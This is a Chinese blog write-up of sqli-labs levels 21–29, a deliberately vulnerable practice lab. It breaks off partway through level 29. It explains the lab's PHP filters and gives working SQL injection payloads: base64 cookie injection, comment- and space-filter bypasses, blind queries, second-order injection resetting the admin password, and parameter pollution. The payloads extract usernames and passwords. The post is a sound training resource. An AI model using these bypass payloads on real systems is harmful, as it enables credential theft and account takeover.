sqli-labs通关汇总-page2

已于 2022-06-25 10:30:23 修改
阅读量514 收藏 1
点赞数
分类专栏: sqli-labs 文章标签: 安全 php web安全 数据库 sql
于 2022-05-31 14:50:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_37638874/article/details/125063999
版权

  less-21(头部Cookie、Base64加密、单引号括号、联合查询)
    base64_encode()
    base64_decode()
  less-22(头部Cookie、Base64加密、双引号、联合查询)
  less-23(GET型、【#,- -】注释过滤、单引号、联合查询)
    preg_replace()
  less-24(二次注入)
    第一次登录
    第二次登录
    修改密码
    创建新用户
    session_start()
    $_SESSION
    mysqli_affected_rows()
    session_destroy()
  less-25(GET型、【or,and】过滤、单引号、双写绕过联合查询)
  less-25a
  less-26(GET型、【or,and,/,\,*,-,#,空格】过滤、单引号,报错回显与布尔盲注)
    PHP正则表达式
      1.preg_replace()
      2.正则表达式的格式
      3.Modifier
      4.集合
  less-26a(GET型、【or,and,/,\,*,-,#,空格】过滤、单引号括号,报错回显与布尔盲注)
  less-27(GET型、【/,*,-,#,空格,+,select,union】、单引号、报错回显与布尔盲注)
  less-27a(GET型、【/,*,-,#,空格,+,select,union】、单引号、布尔盲注)
  less-28(GET型、【/,*,-,#空格,+】、单引号括号、布尔盲注)
  less-28a
  less-29(GET型、单引号、HTTP参数污染绕过)
    SERVER[‘QUERY_STRING’]
    preg_match()
    explode()
    foreach()
    GET的取值方式
  less-30(GET型、双引号、HTTP参数污染绕过)
  less-31(GET型、双引号括号、HTTP参数污染绕过)
  less-32(GET型、单引号、preg_replace()转义、宽字节注入与联合查询)
    strlen()
    ord()
    dechex()
    preg_quote()
  less-33(GET型、单引号、addslashes()转义、宽字节注入与联合查询)
    addslashes()
  less-34(POST型、单引号、addslashes()转义、宽字节注入与联合查询)
  less-35(GET型、数字型、addslashes()转义、宽字节注入联合查询)
  less-36(GET型、单引号、mysqli_real_escape_string()转义、宽字节注入联合查询)
    mysqli_real_escape_string()
  less-37(POST型、单引号、mysqli_real_escape_string()转义、宽字节注入联合查询)

less-21
标题:Cookie injection base64 encoded single quotes and parenthesis

文章标题告知是 base64编码的 ') 闭合的cookie注入

和20关的流程一样,我们抓包能看到
在这里插入图片描述
cookie是加密的,base64是一种常见的加密格式,怎么判断是不是base64呢,一般是

  • 字符串的长度为4的整数倍
  • 字符串的符号取值只能在 A-Z, a-z, 0-9, +, /,
    =     共计65个字符中,且 = 如果出现就必须在结尾出现。

可详见
一篇文章彻底弄懂Base64编码原理
快速判断字符串是不是base64编码

base64编码是一种常用的字符编码,在很多地方都会用到。但base64不是安全领域下的加密解密算法。能起到安全作用的效果很差,而且很容易破解,他核心作用是传输数据的正确性,有关网关或系统只能使用ASCII字符。base64就是用来将非ASCII字符的数据转换成ASCII字符的一种方法,而且base64特别适合在http,mime协议下快速传输数据。

常见的编码,大家可以了解下,比如

页面编码(utf-8、gbk、gbk2312)、ASCII编码、HTML编码、URL编码、js编码、hex编码、base64编码、json编码、序列化、utf7编码

此处是base64编码(这玩意就是感觉嘛,一般也不会拿这个做加密)
我们拿原文解个密
在这里插入图片描述
其实也就是我们需要在传值前做个加密即可,网上有的是burpsuite也自带加密功能(快捷键是ctrl+B),如下
在这里插入图片描述

payload

JykgdW5pb24gc2VsZWN0IDEsKHNlbGVjdCBncm91cF9jb25jYXQoY29uY2F0X3dzKDB4N2UsdXNlcm5hbWUscGFzc3dvcmQpKSBmcm9tIHVzZXJzKSwzIw==
解密后:
') union select 1,(select group_concat(concat_ws(0x7e,username,password)) from users),3#

查询语句

SELECT * FROM users WHERE username=('') union select 1,(select group_concat(concat_ws(0x7e,username,password)) from users),3#') LIMIT 0,1

在这里插入图片描述
我们再看一下部分源码

setcookie('uname', base64_encode($row1['username']), time()+3600);

base64_encode()

字符串加密为base64格式
这里是服务器向前端传cookie时

$cookee = base64_decode($cookee);
$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";

base64_decode()

base64密文解密
这里是前端带cookie对服务器请求时,也是我们的注入点

除了加密其他地方跟20关一样

less-22

标题:Cookie injecttion base64 encoded - double quotes

标题来看是 base64加密的双引号cookie注入
换汤不换药,但是自己也需要一步步试一下

payload

IiB1bmlvbiBzZWxlY3QgMSwoc2VsZWN0IGdyb3VwX2NvbmNhdChjb25jYXRfd3MoMHg3ZSx1c2VybmFtZSxwYXNzd29yZCkpIGZyb20gdXNlcnMpLDMj
解密后:
" union select 1,(select group_concat(concat_ws(0x7e,username,password)) from users),3#

查询语句

SELECT * FROM users WHERE username="" union select 1,(select group_concat(concat_ws(0x7e,username,password)) from users),3#" LIMIT 0,1

在这里插入图片描述

less-23

标题:GET -Error based - strip comments

标题是基于报错的过滤注释

我们按步骤来

payload:1'
//报错,曝出后半段查询语句
payload:1' select 1,2,3 --+
//报错

在这里插入图片描述
我们发现 - - 被注释掉了

我们再试试

payload:1' select 1,2,3#

在这里插入图片描述
# 也被注释掉了

我们直接看源码,我们得知此关在原本的代码里加了这么个东西

$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);

preg_replace()

preg_replace函数执行一个正则表达式的搜索和替换,详见PHP preg_replace() 函数

语法:

mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] )
参数描述
$pattern要搜索的模式,可以是字符串或一个字符串数组
$replacement用于替换的字符串或字符串数组
$subject要搜索替换的目标字符串或字符串数组
$limit可选,对于每个模式用于每个subject字符串的最大可替换次数。默认是-1(无限制)
$count可选,为替换执行的次数。

就是说注释不能用了,咋治
只能联合查询
payload

-1' union select 1,2,3 and '1'='1

SELECT * FROM users WHERE id='-1' union select 1,2,3 and '1'='1d' LIMIT 0,1

在这里插入图片描述
后面就跟之前一样了

-1' union select 1,(select GROUP_CONCAT(username,password) from users),3 and '1'='1

SELECT * FROM users WHERE id='-1' union select 1,(select GROUP_CONCAT(username,password) from users),3 and '1'='1' LIMIT 0,1

在这里插入图片描述

当前语句还能缩减一下

payload

id=-1' union select 1,2,3='1

SELECT * FROM users WHERE id='-1' union select 1,2,3='1' LIMIT 0,1

SQL语句基础自己学

less-24

标题:POST - Second oder injections Real treat - Stored injections

不知道啥意思,搞不明白,看源码吧,源码太多,没法全贴

session原理部分详见PHP Session原理简析

基本流程如下

在这里插入图片描述

第一次登录

在这里插入图片描述

index.php(主页面)

session_start();
if (isset($_SESSION['username']) && isset($_COOKIE['Auth'])) {
   header('Location: logged-in.php');

session_start()

启动session,根据session ID打开session文件,如果没有就创建一个ID(这个Session ID是通过一系列算法生成的一个唯一字符串)和对应的session文件。
session_start()函数必须位于html标签之前

我们看看数据包
在这里插入图片描述
我们以第一访问index时,请求包里是没有phpsessionID的,我们访问页面,服务器端session_start()以后,就会给前端传一个phpsessionid值
在这里插入图片描述
我们再次访问的时候,请求包里就会包含此phpsessionid值,我们访问其他本网站的页面也会携带此phpsessionid
在这里插入图片描述
这个phpsessionid值存活到浏览器关闭前

$_SESSION

存储和取回session变量

启动session,这里是判断两个变量( SESSION[‘username’]、COOKIE[‘Auth’]是否为空,第一次访问肯定是空的,我们先跳过

我们输入:
用户名:admin
密码:admin
对应的源码

<input name="login_user" id="login_user" type="text" value="" />
<input name="login_password" id="login_password" type="password" value="" />

我们向服务器输入了两个值

login_userlogin_password

<form name="login" method="POST" action="login.php">

该表单提交到login.php,我们看一下login.php

也有session_start()
session_start() 拿不到 session数据

login.php自定义了一个方法 sqllogin()

function sqllogin($con1){

   $username = mysqli_real_escape_string($con1, $_POST["login_user"]);
   $password = mysqli_real_escape_string($con1, $_POST["login_password"]);
   $sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
//$sql = "SELECT COUNT(*) FROM users WHERE username='$username' and password='$password'";
   $res = mysqli_query($con1, $sql) or die('You tried to be real smart, Try harder!!!! :( ');
   $row = mysqli_fetch_row($res);
	//print_r($row) ;
   if ($row[1]) {
	return $row[1];
   } else {
	return 0;
   }

}

将刚才index.php输入的login_userlogin_password,转义后查询,
得到id、username、password赋值给 $res
然后将 其以关联数组的形式赋值给 $row
下面是做判断,如果 row[1] 有数据就返回,row[1] 就是 username没有就返回0

$login = sqllogin($con1);
if (!$login== 0) 
{
	$_SESSION["username"] = $login;
	setcookie("Auth", 1, time()+3600);  /* expire in 15 Minutes */
	header('Location: logged-in.php');
}

sqllogin函数的结果赋值给变量 $login
如果不为空,则将查询到的username的值赋值给session变量username
一个变量Auth赋值为1作为cookie返回给用户

我们查看数据包
在这里插入图片描述
302重定向到logged-in.php

然后跳转到 logged-in.php页面

我们的请求包就携带Auth=1;了
在这里插入图片描述

刚上来就有个判断

session_start();
if (!isset($_COOKIE["Auth"]))
{
	if (!isset($_SESSION["username"])) 
	{
   		header('Location: index.php');
	}
	header('Location: index.php');
}

判断cookie的Auth与session的username是否为空,只要有一个为空,就跳回首页

<?php
echo $_SESSION["username"];
?>

中间有一段PHP代码用来输出session的username的值,对应页面的
在这里插入图片描述
后面修改密码的先不看,我们第一次登录获取session就算完成了,对应的下面这一部分
在这里插入图片描述

这是我画的一个登录过程的流程图
在这里插入图片描述

第二次登录

session_start();
if (isset($_SESSION['username']) && isset($_COOKIE['Auth'])) {
   header('Location: logged-in.php');

SESSION[‘username’]COOKIE[‘Auth’] 是有值的
在这里插入图片描述
直接跳转到 logged-in.php

对应的流程图绿色部分
在这里插入图片描述

修改密码

在这里插入图片描述

<input name="current_password" id="current_password" type="text" value="" /> 
<input name="password" id="password" type="password" value="" />
<input name="re_password" id="re_password" type="password" value="" />

让我们输入三个值:
current_passwordpasswordre_password

<input name="submit" id="submit" type="submit" value="update password" />
<input name="submit1" id="submit1" type="submit" value="Logout" />

还有两个值是:
submitsubmit1

<form name="mylogin" method="POST" action="pass_change.php">

表单提交到pass_change.php

开头同样是

session_start();
if (!isset($_COOKIE["Auth"]))
{
	if (!isset($_SESSION["username"])) 
	{
   		header('Location: index.php');
	}
	header('Location: index.php');
}

session_start(),判断cookie的Auth与session的username是否为空,只要有一个为空,就跳回首页

if (isset($_POST['submit']))
{
	
	
	# Validating the user input........
	$username= $_SESSION["username"];
	$curr_pass= mysqli_real_escape_string($con1, $_POST['current_password']);
	$pass= mysqli_real_escape_string($con1, $_POST['password']);
	$re_pass= mysqli_real_escape_string($con1, $_POST['re_password']);
	
	if($pass==$re_pass)
	{	
		$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
		$res = mysqli_query($con1, $sql) or die('You tried to be smart, Try harder!!!! :( ');
		$row = mysqli_affected_rows($con1);
		echo '<font size="3" color="#FFFF00">';
		echo '<center>';
		if($row==1)
		{
			echo "Password successfully updated";
	
		}
		else
		{
			header('Location: failed.php');
			//echo 'You tried to be smart, Try harder!!!! :( ';
		}
	}
	else
	{
		echo '<font size="5" color="#FFFF00"><center>';
		echo "Make sure New Password and Retype Password fields have same value";
		header('refresh:2, url=index.php');
	}
}

判断submit是否为空,就是看看logged-in.php传进来的值是修改密码还是退出登录假设是修改密码

$pass==$re_pass

先判断新密码两次输入是否一致
然后根据username现密码 查询并修改密码为新密码

$row = mysqli_affected_rows($con1);

mysqli_affected_rows()

mysqli_affected_rows() 函数返回前一次 MySQL 操作(SELECT、INSERT、UPDATE、REPLACE、DELETE)所影响的记录行数。

语法:

mysqli_affected_rows(connection);
参数描述
connection必需。规定要使用的 MySQL 连接。

下面是判断是不是影响一行,影响一行就返回成功,多行就跳转到failed.phpfailed.php就一张图片告诉你别乱搞

header('refresh:2, url=index.php');

这里的refresh:2是两秒后刷新页面

if(isset($_POST['submit1']))
{
	session_destroy();
	setcookie('Auth', 1 , time()-3600);
	header ('Location: index.php');
}

这里就是退出登录操作

session_destroy()

注销session,这个就是关闭session,并删除掉相应的session文件了。切断了客户端和服务端的联系。
session_destroy() 将重置 session,您将失去所有已存储的 session 数据。

cookie有效时间减一小时,最后跳转到index.php
在这里插入图片描述

修改密码流程图如下
在这里插入图片描述

在这里插入图片描述
忘记密码功能里面没东西

创建新用户

在这里插入图片描述
点击跳转到 new_user.php

这里就是新模块了,跟登录、修改密码是不挂钩的

<input name="username" id="username" type="text" value="" />
<input name="password" id="password" type="password" value="" />
<input name="re_password" id="re_password" type="password" value="" />

输入3个值,usernamepasswordre_password

<form name="mylogin" method="POST" action="login_create.php">

然后提交到login_create.php

session_start();

if (isset($_POST['submit']))
{


	# Validating the user input........

	//$username=  $_POST['username'] ;
	$username=  mysqli_real_escape_string($con1, $_POST['username']) ;
	$pass= mysqli_real_escape_string($con1, $_POST['password']);
	$re_pass= mysqli_real_escape_string($con1, $_POST['re_password']);

	echo "<font size='3' color='#FFFF00'>";
	$sql = "select count(*) from users where username='$username'";
	$res = mysqli_query($con1, $sql) or die('You tried to be smart, Try harder!!!! :( ');
	$row = mysqli_fetch_row($res);

	//print_r($row);
	if (!$row[0]==0) 
	{
		?>
		<script>alert("The username Already exists, Please choose a different username ")</script>;
		<?php
		header('refresh:1, url=new_user.php');
	} 
	else 
	{
		if ($pass==$re_pass)
		{
			# Building up the query........

			$sql = "insert into users (username, password) values(\"$username\", \"$pass\")";
			mysqli_query($con1, $sql) or die('Error Creating your user account,  : '.mysqli_error($con1));
			echo "</br>";
			echo "<center><img src=../images/Less-24-user-created.jpg><font size='3' color='#FFFF00'>";   				
			//echo "<h1>User Created Successfully</h1>";
			echo "</br>";
			echo "</br>";
			echo "</br>";					
			echo "</br>Redirecting you to login page in 5 sec................";
			echo "<font size='2'>";
			echo "</br>If it does not redirect, click the home button on top right</center>";
			header('refresh:5, url=index.php');
		}
		else
		{
			?>
			<script>alert('Please make sure that password field and retype password match correctly')</script>
			<?php
			header('refresh:1, url=new_user.php');
		}
	}
}

先是判断submit是不是空

$sql = "select count(*) from users where username='$username'";

然后做了个查询,判断查询有没有结果,有结果说明用户名已经存在,就跳转到new_user.php注册页面
如果没有结果,说明没有同名,然后判断两次密码输入是否一致

$sql = "insert into users (username, password) values(\"$username\", \"$pass\")";

如果一致,做了个数据库插入操作,然后跳转回index.php
如果不一致,跳转回new_user.php注册页面

流程图
在这里插入图片描述
这种怎么搞,我们先理一下思路,SQL注入是为了向后端传值,我们应该找什么,找输入点,首先输入点有三处,而且都是post类型

1.登录输入【用户名】【密码】
2.修改密码输入【现密码】【新密码】【重复新密码】
3.注册输入【用户名】【密码】

当然我们看源码知道都做了转义,了但实际遇到的时候,都需要考虑可能存在哪些注入的,还是运用之前的知识

1.登录select

SELECT * FROM users WHERE username='$username' and password='$password'

2.修改密码update

UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass'

3.注册输入insert

insert into users (username, password) values(\"$username\", \"$pass\")

这样是不是能稍微有点亲切感

在这里插入图片描述

这题的注入点在这,这个$username取的是session的username的值

$username= $_SESSION["username"];

这个吊毛没做转义,其他地方虽然做转义了,但是没做过滤,所以我们只需要注册个账号叫

账号:admin'#
密码:123

在这里插入图片描述

登录后修改密码

new password:abc
retype password:abc

构造成的查询语句

UPDATE users SET PASSWORD='abc' where username='admin'#' and password='123'

相当于只判断用户名,即可完成密码修改
在这里插入图片描述
看一下数据库
在这里插入图片描述

完成

less-25

标题:GET - Error based All your OR & AND belong to us string single quote

get类型单引号基于报错(OR/AND)过滤的注入

payload:'
//报错,曝出后半段查询语句

payload:' and '1'='1

在这里插入图片描述
在这里插入图片描述
and被过滤了,但为什么还有值呢,我们看一下Navicat
在这里插入图片描述

这里就牵扯SQL的逻辑结构了详见WHERE id=1=0

这里的

id='1' '1'='1'

等于

(id='1' '1')='1'

等于

(id='11') = TRUE

这题的话,不用and和or不影响我们回显数据库内容

payload

0' union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3 -- -

查询语句

SELECT * FROM users where id='0' union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3 -- -' limit 0,1

在这里插入图片描述
我们发现password被过滤了or,焯

我们尝试这么写试试

passwoorrd

在这里插入图片描述
ok,那还是可以用or和and

我们看一下源码

function blacklist($id)
{
	$id= preg_replace('/or/i',"", $id);			//strip out OR (non case sensitive)
	$id= preg_replace('/AND/i',"", $id);		//Strip out AND (non case sensitive)
	
	return $id;
}

源码自定义了一个blacklist方法,用来过滤or和and

$id=$_GET['id'];

但是在文中只调用了一次,所以我们可以用

oorr   或 aandnd

之类的方法绕过,其他都跟之前的get型注入一样

less-25a

没有页面

less-26

标题:GET - Error based - All your SPACES and COMMENTS belong to us

过滤空格和注释

payload

'or'1'='1#

在这里插入图片描述

不光是空格注释被过滤了,or和and也被过滤了

爆数据库

'aandnd(updatexml(1,concat(0x7e,database()),1))aandnd'1'='1

查询语句

SELECT * FROM users WHERE id=''and(updatexml(1,concat(0x7e,database()),1))and'1'='1' LIMIT 0,1

在这里插入图片描述
在这里插入图片描述
爆表

'aandnd(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema='security'))),1))aandnd'1'='1

SELECT * FROM users WHERE id=''and(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema='security'))),1))and'1'='1' LIMIT 0,1

这里需要绕过过滤,可参考
SQL注入一些过滤及绕过总结
SQL注入过滤的绕过

在这里插入图片描述
在这里插入图片描述

这里是用括号绕过了空格的过滤

爆字段

'aandnd(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema='security')aandnd(table_name='users'))),1))aandnd'1'='1

SELECT * FROM users WHERE id=''and(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema='security')and(table_name='users'))),1))and'1'='1' LIMIT 0,1

在这里插入图片描述
在这里插入图片描述
爆账号密码

'aandnd(updatexml(1,concat(0x7e,(select(group_concat(concat_ws(0x7e,username,passwoorrd)))from(users))),1))aandnd'1'='1

SELECT * FROM users WHERE id=''and(updatexml(1,concat(0x7e,(select(group_concat(concat_ws(0x7e,username,password)))from(users))),1))and'1'='1' LIMIT 0,1

在这里插入图片描述
在这里插入图片描述

因为limit后面没法跟空格,所以没法使用,不适用limit就不能获取全部账号密码

这时候需要知道,若存在

空格过滤
中间件是Apache

**只能采用盲注获取字段值**

如下的方法

SELECT * FROM users WHERE id='1'and(ascii(substr((select(group_concat(username))from(users)),1,1))=68)and'1'='1' LIMIT 0,1

逗号的ascii码是44,注意一下用来区分字段值

我们看一下源码的过滤函数

function blacklist($id)
{
	$id= preg_replace('/or/i',"", $id);			//strip out OR (non case sensitive)
	$id= preg_replace('/and/i',"", $id);		//Strip out AND (non case sensitive)
	$id= preg_replace('/[\/\*]/',"", $id);		//strip out /*
	$id= preg_replace('/[--]/',"", $id);		//Strip out --
	$id= preg_replace('/[#]/',"", $id);			//Strip out #
	$id= preg_replace('/[\s]/',"", $id);		//Strip out spaces
	$id= preg_replace('/[\/\\\\]/',"", $id);		//Strip out slashes
	return $id;
}

该函数采用正则表达式过滤字符,正则表达式可参考
正则表达式中的/\\\\/四个反斜杠含义
php中正则表达式详解
PHP正则表达式
正则表达式

PHP正则表达式

我们不可能全抄,只提一下我们用到的

1.preg_replace()

preg_replace(正则表达式、替换成什么、匹配的字符串)

正则表达式的格式

2.正则表达式的格式

"/表达式/[修饰符]"

3.修饰符

i
使用此修饰符后,搜索时不区分大小写:A和a没有区别
g
使用此修饰符后,搜索时会查找所有的匹配项,如果没有标志 g,则正则表达式仅查找第一个匹配项
m
多行模式,这仅仅会影响 ^ 和 $ 锚符的行为,在多行模式下,它们不仅仅匹配文本的开始与结束,还匹配每一行的开始与结束
插入符号 ^ 和美元符号 $ 在正则表达式中具有特殊的意义。它们被称为“锚点”。
插入符号 ^ 匹配文本开头,而美元符号 $ - 则匹配文本末尾
如:测试一下文本是否以 Mary 开头:^Mary
s
启用 “dotall” 模式,允许点 . 匹配换行符 \n(默认情况下,点与换行符 \n 不匹配)

4.集合

[eao] 意味着查找在 3 个字符 'a'、'e' 或者 ‘o’ 中的任意一个

如上

$id= preg_replace('/or/i',"", $id);

不区分大小写的替换or

$id= preg_replace('/[\/\*]/',"", $id);

替换 ‘/’ 或 ‘*’ 中的任意一个

$id= preg_replace('/[\/\\\\]/',"", $id);

替换 ‘/’ 或 ‘\’ 中的任意一个

$id= preg_replace('/select/m',"", $id);

因为多行模式仅仅会影响 ^ 和 $ 锚符的行为,所以这里m没有意义

$id= preg_replace('/union/s',"", $id);

/s允许点 . 匹配换行符 \n,这里没有 . ,所以没有意义

less-26a
标题:GET - Blind Based -All your SPACES and COMMENTS belong to us - String single quotes Parenthesis
跟26关一样,就是闭合变为’)了

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

less-27

标题:GET -Error Based -All your UNION & SELECT Belong to us - String -Single quote

这里应该是吧union和select也过滤了

我们试试

payload

and or union UnIoN select sElEcT--#

在这里插入图片描述

and和or没过滤,空格被过滤了


select和union可以通过大小写混合绕过

注释可以用单引号闭合绕过

因为中间件是Apache,所以空格没办法采用 %a0 或 %0b 绕过

我们输入1’
在这里插入图片描述
可以看出来是单引号闭合

查数据库

1'and(updatexml(0,concat(0x7e,database()),0))and'1'='1

SELECT * FROM users WHERE id='1'and(updatexml(0,concat(0x7e,database()),0))and'1'='1' LIMIT 0,1

在这里插入图片描述
查表

1'and(updatexml(0,concat(0x7e,(sElEcT(GROUP_CONCAT(table_name))from(information_schema.tables)where(table_schema='security'))),0))and'1'='1

SELECT * FROM users WHERE id='1'and(updatexml(0,concat(0x7e,(sElEcT(GROUP_CONCAT(table_name))from(information_schema.tables)where(table_schema='security'))),0))and'1'='1' LIMIT 0,1

在这里插入图片描述

查字段

1'and(updatexml(0,concat(0x7e,(sElEcT(GROUP_CONCAT(column_name))from(information_schema.columns)where((table_schema='security')and(table_name='users')))),0))and'1'='1

SELECT * FROM users WHERE id='1'and(updatexml(0,concat(0x7e,(sElEcT(GROUP_CONCAT(column_name))from(information_schema.columns)where((table_schema='security')and(table_name='users')))),0))and'1'='1' LIMIT 0,1

在这里插入图片描述
查值,这时候,要想获取全部的用户名密码只能用盲注去猜了

1'and(ascii(substr((sElEct(group_concat(username))from(users)),1,1))=68)and'1'='1

SELECT * FROM users WHERE id='1'and(ascii(substr((sElEct(group_concat(username))from(users)),1,1))=68)and'1'='1' LIMIT 0,1

我们看一下源码的过滤

function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id);		//strip out /*
$id= preg_replace('/[--]/',"", $id);		//Strip out --.
$id= preg_replace('/[#]/',"", $id);			//Strip out #.
$id= preg_replace('/[ +]/',"", $id);	    //Strip out spaces.
$id= preg_replace('/select/m',"", $id);	    //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id);	    //Strip out spaces.
$id= preg_replace('/union/s',"", $id);	    //Strip out union
$id= preg_replace('/select/s',"", $id);	    //Strip out select
$id= preg_replace('/UNION/s',"", $id);	    //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id);	    //Strip out SELECT
$id= preg_replace('/Union/s',"", $id);	    //Strip out Union
$id= preg_replace('/Select/s',"", $id);	    //Strip out select
return $id;
}

正则表达式上一关讲过了

less-27a

标题:GET - Blind Based -All your UNION & SELECT Belong to us Double Quotes

输入 1' ,不报错
在这里插入图片描述
输入1"
在这里插入图片描述
不报错,盲注类型的

只能猜

payload

and or union UnIoN select sElEcT--#

在这里插入图片描述
我们看看源码

function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id);		//strip out /*
$id= preg_replace('/[--]/',"", $id);		//Strip out --.
$id= preg_replace('/[#]/',"", $id);			//Strip out #.
$id= preg_replace('/[ +]/',"", $id);	    //Strip out spaces.
$id= preg_replace('/select/m',"", $id);	    //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id);	    //Strip out spaces.
$id= preg_replace('/union/s',"", $id);	    //Strip out union
$id= preg_replace('/select/s',"", $id);	    //Strip out select
$id= preg_replace('/UNION/s',"", $id);	    //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id);	    //Strip out SELECT
$id= preg_replace('/Union/s',"", $id);	    //Strip out Union
$id= preg_replace('/Select/s',"", $id);	    //Strip out Select
return $id;
}

猜库

1"and(ascii(substr((database()),1,1))=115)and"1"="1

SELECT * FROM users WHERE id="1"and(ascii(substr((database()),1,1))=115)and"1"="1" LIMIT 0,1

猜表

1"and(ascii(substr((sElEcT(group_concat(table_name))from(information_schema.tables)where(table_schema='security')),1,1))=101)and"1"="1

SELECT * FROM users WHERE id="1"and(ascii(substr((sElEcT(group_concat(table_name))from(information_schema.tables)where(table_schema='security')),1,1))=101)and"1"="1" LIMIT 0,1

猜字段

1"and(ascii(substr((sElEcT(group_concat(column_name))from(information_schema.columns)where((table_schema='security')and(table_name='users'))),1,1))=105)and"1"="1

SELECT * FROM users WHERE id="1"and(ascii(substr((sElEcT(group_concat(column_name))from(information_schema.columns)where((table_schema='security')and(table_name='users'))),1,1))=105)and"1"="1" LIMIT 0,1

猜字段值

1"and(ascii(substr((sElEct(group_concat(username))from(users)),1,1))=68)and"1"="1

SELECT * FROM users WHERE id="1"and(ascii(substr((sElEct(group_concat(username))from(users)),1,1))=68)and"1"="1" LIMIT 0,1

OK

less-28

标题:GET - Error Based All your UNION & SELECT Belong to us - String - single quote with parenthesis

输入 1'
在这里插入图片描述
输入 1'and'1'='1
在这里插入图片描述
输入 1'and'1'='2
在这里插入图片描述
输入

1'and(ascii(substr((database()),1,1))=115)and'1'='1

在这里插入图片描述
但我们看源码

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

其实人家是 ') 闭合的

在这里插入图片描述
但看一下,也能完成闭合,也没什么毛病

看一下过滤函数

function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id);				//strip out /*
$id= preg_replace('/[--]/',"", $id);				//Strip out --.
$id= preg_replace('/[#]/',"", $id);					//Strip out #.
$id= preg_replace('/[ +]/',"", $id);	    		//Strip out spaces.
//$id= preg_replace('/select/m',"", $id);	   		 	//Strip out spaces.
$id= preg_replace('/[ +]/',"", $id);	    		//Strip out spaces.
$id= preg_replace('/union\s+select/i',"", $id);	    //Strip out UNION & SELECT.
return $id;
}

最后一个过滤unionselect的好像没什么用,我没看懂啥意思

less-28a

标题:GET - Blind Based -All your UNION & SELECT Belong to us single quote - parenthesis

这一关没看出有啥过滤的来

function blacklist($id)
{
//$id= preg_replace('/[\/\*]/',"", $id);				//strip out /*
//$id= preg_replace('/[--]/',"", $id);				//Strip out --.
//$id= preg_replace('/[#]/',"", $id);					//Strip out #.
//$id= preg_replace('/[ +]/',"", $id);	    		//Strip out spaces.
//$id= preg_replace('/select/m',"", $id);	   		 	//Strip out spaces.
//$id= preg_replace('/[ +]/',"", $id);	    		//Strip out spaces.
$id= preg_replace('/union\s+select/i',"", $id);	    //Strip out spaces.
return $id;
}

源码这个过滤也不知道过滤的啥

less-29

标题:GET - Error based IMPIDENCE MISMARCH Having a WAF in front of web application

标题说是有个防火墙,没搞懂

这一关没看源码前我试了一下就是单引号GET型注入
我们看一下源码有什么不同

这关有三个文件
在这里插入图片描述
在这里插入图片描述
直接访问网站的话是跳到主页文件index.php

index.php没有什么特殊的,只是多了一句

$qs = $_SERVER['QUERY_STRING'];
$hint=$qs;

$_SERVER[‘QUERY_STRING’]
详见
PHP 超级全局变量
详解 $_SERVER 函数中QUERY_STRING和REQUEST_URI区别

$_SERVER['QUERY_STRING']用来获取?后的值
本题中获取的是id=....的值

index.php就这些了,没其他东西了,我们看看login.php

whitelist方法

//WAF implimentation with a whitelist approach..... only allows input to be Numeric.
function whitelist($input)
{
	$match = preg_match("/^\d+$/", $input);
	if($match)
	{
		//echo "you are good";
		//return $match;
	}
	else
	{	
		header('Location: hacked.php');
		//echo "you are bad";
	}
}

preg_match()

preg_match函数用于执行一个正则表达式匹配
详见PHP preg_match() 函数

语法:

int preg_match ( string $pattern , string $subject [, array &$matches [, int $flags = 0 [, int $offset = 0 ]]] )
参数描述
$pattern要搜索的模式,字符串形式
$subject输入字符串

返回值:

返回pattern的匹配次数。它的值将是0次(不匹配)或1次,因为preg_match()在第一次匹配后将会停止搜索。preg_match_all()不同于此,它会一直搜索subject直到到达结尾。如果发生错误preg_match()返回FALSE

"/^\d+$/"代表完全匹配数字

所以此处代码意思是对传进来的input变量进行判断,若不为纯数字则跳转到hacked.phphacked.php只有个a标签跳转回login.php

我们继续看login.php的下个自定义方法java_implimentation()

// The function below immitates the behavior of parameters when subject to HPP (HTTP Parameter Pollution).
function java_implimentation($query_string)
{
	$q_s = $query_string;
	$qs_array= explode("&",$q_s);


	foreach($qs_array as $key => $value)
	{
		$val=substr($value,0,2);
		if($val=="id")
		{
			$id_value=substr($value,3,30); 
			return $id_value;
			echo "<br>";
			break;
		}
	}
}

explode()

详见PHP explode() 函数

定义和用法:

explode() 函数使用一个字符串分割另一个字符串,并返回由字符串组成的数组。

语法:

explode(separator,string,limit)
参数描述
separator必须。规定在哪里分割字符串
string必须。要分割的字符串

返回值:

返回字符串数组

foreach()

详见详解PHP中foreach的用法和实例

定义和用法:

遍历数组array_expression和键名,键名赋值给key,值赋值给value

语法:

foreach (array_expression as $key => $value)

参数描述
array_expression必需。要遍历的数组
key存储键名
value存储值

java_implimentation($query_string)方法将传进来的字符按&分割,传入数组qs_array,然后循环遍历数组,取数组值的前两位,若是id,则返回数组值的[3-33]位字符

我们看一下主函数部分

if(isset($_GET['id']))
{
	$qs = $_SERVER['QUERY_STRING'];
	$hint=$qs;
	$id1=java_implimentation($qs);
	$id=$_GET['id'];
	//echo $id1;
	whitelist($id1);
	

$id1=java_implimentation($qs);

